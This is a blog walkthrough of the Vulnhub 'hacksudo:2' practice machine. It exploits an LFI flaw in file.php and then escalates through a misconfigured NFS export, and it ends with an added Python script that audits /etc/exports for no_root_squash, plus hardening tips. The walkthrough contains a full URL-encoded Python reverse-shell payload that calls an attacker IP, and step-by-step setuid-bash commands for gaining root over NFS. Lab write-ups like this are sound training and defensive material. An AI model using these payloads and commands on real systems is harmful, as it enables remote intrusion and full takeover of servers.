Windy's little blog

All the odds and ends of life, and I like CTF.

Vulnhub hacksudo:2 Walkthrough

https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/


Scan ports.



Scan port 80.



Info.php is phpinfo, and file.php has an LFI vulnerability.



Use the exploit script below to get a command shell.

https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py

Check if the shell is OK.



Then visit the following URL to get an interactive reverse shell:

http://192.168.56.93/file.php?file=/tmp/f&1=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27



OK, there is another way to get a user shell. (Sometimes exp.py does not work.)

First mount the NFS share, then copy reverse.php to /mnt/nfs, and visit it using file.php?file=/mnt/nfs/reverse.php.



Since NFS is available and misconfigured, we can get root through NFS.

On the attacker's machine, run the following commands:

showmount -e 192.168.56.93
sudo mount -t nfs 192.168.56.93:/mnt/nfs /mnt
cd /mnt
sudo cp /bin/bash ./
sudo chmod +s ./bash


Then, back in the reverse shell, we can get root.
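
From the defender's side, the misconfiguration used above can be found by auditing the server's export list. The following is an added example, not part of the original walkthrough: it assumes the misconfiguration is the usual `no_root_squash` export option (the page does not show the export's options), and the sample exports text and the function names `parse_exports` and `audit` are constructed for illustration.

```python
import re

# Constructed sample in exports(5) syntax; the walkthrough does not show the
# target's real /etc/exports, so these lines are assumptions for illustration.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/mnt/nfs    *(rw,sync,no_root_squash,no_subtree_check)
/srv/share  192.168.56.0/24(rw,sync,root_squash) backup.example(ro)
/srv/pub    (ro,sync)
"""

SPEC = re.compile(r"([^()]*)(?:\(([^()]*)\))?")

def parse_exports(text):
    """Yield (path, client, options) per client spec. Quoted paths and
    '-option' default lists are out of scope here."""
    text = text.replace("\\\n", " ")           # join continuation lines
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        path, specs = fields[0], fields[1:] or ["*"]   # no client = everyone
        for spec in specs:
            m = SPEC.fullmatch(spec)
            if m is None:
                continue                       # malformed spec, skip it
            client = m.group(1) or "*"         # "(opts)" alone = everyone
            opts = {o for o in (m.group(2) or "").split(",") if o}
            yield path, client, opts

def audit(text):
    """Return (severity, path, client, reason) findings."""
    findings = []
    for path, client, opts in parse_exports(text):
        writable = "rw" in opts                # exports default to ro
        if "no_root_squash" in opts:           # root_squash is the default
            sev = "HIGH" if writable else "MEDIUM"
            findings.append((sev, path, client,
                             "no_root_squash: client uid 0 stays root on the server"))
        if writable and client == "*":
            findings.append(("MEDIUM", path, client, "writable by any host"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORTS):
        print("%-6s %-10s %-18s %s" % finding)
```

Removing `no_root_squash` and limiting the client list to known hosts closes both findings. Mounting the exported filesystem with `nosuid` on the server also stops a planted setuid binary from granting root.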


